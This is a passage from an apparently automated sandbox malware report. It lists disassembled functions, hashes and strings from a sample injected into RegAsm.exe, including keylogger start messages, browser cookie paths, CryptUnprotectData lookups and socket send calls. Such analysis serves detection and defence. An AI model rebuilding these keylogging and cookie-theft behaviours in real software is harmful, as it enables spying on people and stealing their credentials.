                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                          • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                          • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                          • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                          APIs
                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                          • _free.LIBCMT ref: 00448353
                                          • _free.LIBCMT ref: 0044837A
                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                          • _free.LIBCMT ref: 10005BB4
                                          • _free.LIBCMT ref: 10005BDB
                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: lstrlen$lstrcat
                                          • String ID:
                                          • API String ID: 493641738-0
                                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                          APIs
                                          • _free.LIBCMT ref: 00450A54
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00450A66
                                          • _free.LIBCMT ref: 00450A78
                                          • _free.LIBCMT ref: 00450A8A
                                          • _free.LIBCMT ref: 00450A9C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                          APIs
                                          • _free.LIBCMT ref: 100091D0
                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                          • _free.LIBCMT ref: 100091E2
                                          • _free.LIBCMT ref: 100091F4
                                          • _free.LIBCMT ref: 10009206
                                          • _free.LIBCMT ref: 10009218
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                          APIs
                                          • _free.LIBCMT ref: 00444106
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00444118
                                          • _free.LIBCMT ref: 0044412B
                                          • _free.LIBCMT ref: 0044413C
                                          • _free.LIBCMT ref: 0044414D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                          APIs
                                          • _free.LIBCMT ref: 1000536F
                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                          • _free.LIBCMT ref: 10005381
                                          • _free.LIBCMT ref: 10005394
                                          • _free.LIBCMT ref: 100053A5
                                          • _free.LIBCMT ref: 100053B6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                           • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                          APIs
                                          • _strpbrk.LIBCMT ref: 0044E7B8
                                          • _free.LIBCMT ref: 0044E8D5
                                            • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                            • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                            • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                          • String ID: *?$.
                                          • API String ID: 2812119850-3972193922
                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                          • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                          APIs
                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00854950,00000010), ref: 004048E0
                                            • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFileKeyboardLayoutNameconnectsend
                                          • String ID: XQG$NG$PG
                                          • API String ID: 1634807452-3565412412
                                          • Opcode ID: 939bf58f81ce87eae8e0c48e6a49ef516d453a11c12e42025cfdb8a130c33550
                                          • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                          • Opcode Fuzzy Hash: 939bf58f81ce87eae8e0c48e6a49ef516d453a11c12e42025cfdb8a130c33550
                                          • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                          • _free.LIBCMT ref: 004435E0
                                          • _free.LIBCMT ref: 004435EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          • API String ID: 2506810119-1068371695
                                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                          • _free.LIBCMT ref: 10004CE8
                                          • _free.LIBCMT ref: 10004CF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                           • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          • API String ID: 2506810119-1068371695
                                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                          • String ID: /sort "Visit Time" /stext "$0NG
                                          • API String ID: 368326130-3219657780
                                          • Opcode ID: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                          • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                          • Opcode Fuzzy Hash: 87d770fe459356d938983b865b1cd302a3835d7c71cdc7891b93df328c2921e7
                                          • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                          APIs
                                          • _wcslen.LIBCMT ref: 00416330
                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _wcslen$CloseCreateValue
                                          • String ID: !D@$okmode$PG
                                          • API String ID: 3411444782-3370592832
                                          • Opcode ID: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                                          • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                          • Opcode Fuzzy Hash: 57136a84a30947c0709b98017b780919d60aa890551a81d584de28234602005d
                                          • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                          APIs
                                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                          Strings
                                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                          • API String ID: 1174141254-1980882731
                                          • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                          • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                          APIs
                                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                          Strings
                                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                          • API String ID: 1174141254-1980882731
                                          • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                          • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTimewsprintf
                                          • String ID: Offline Keylogger Started
                                          • API String ID: 465354869-4114347211
                                          • Opcode ID: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                          • Opcode Fuzzy Hash: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                          APIs
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTime$wsprintf
                                          • String ID: Online Keylogger Started
                                          • API String ID: 112202259-1258561607
                                          • Opcode ID: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                          • Opcode Fuzzy Hash: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                          APIs
                                          • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: CryptUnprotectData$crypt32
                                          • API String ID: 2574300362-2380590389
                                          • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                          • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                          • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                          • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                           • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandleObjectSingleWait
                                          • String ID: Connection Timeout
                                          • API String ID: 2055531096-499159329
                                          • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                          • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                          • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                          • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                          APIs
